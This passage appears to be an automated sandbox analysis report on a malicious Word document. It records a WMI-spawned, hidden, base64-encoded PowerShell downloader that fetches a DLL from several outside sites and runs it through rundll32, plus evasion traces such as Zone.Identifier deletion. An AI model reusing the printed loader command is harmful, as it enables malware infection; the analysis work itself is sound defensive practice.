                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF00270ED3 push E0000000h; ret
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF0027100A push E0000000h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242D98 push 00242E25h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250020 push 00250058h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244038 push 00244064h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021A0B2 push 0021A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021A0B4 push 0021A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021B274 push 0021B2CDh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C34C push 0022C378h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021E450 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250498 push 002504EFh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002504F4 push 0025055Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002505B8 push 002505E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250580 push 002505ACh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B588 push 0024B5CAh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002505F0 push 0025063Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250654 push 00250680h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025068C push 002506B8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021E696 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021E6F0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002506C4 push 002506F0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021D6DC push 0021D751h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00218748 push 00218774h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021E750 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021D754 push 0021D7ADh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002537A8 push 002537E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00218798 push 002187C4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002507E4 push 00250827h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250834 push 00250860h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025086C push 00250898h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00253848 push 00253874h; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Kizmwn\teeko.fjqJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kizmwn\teeko.fjq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
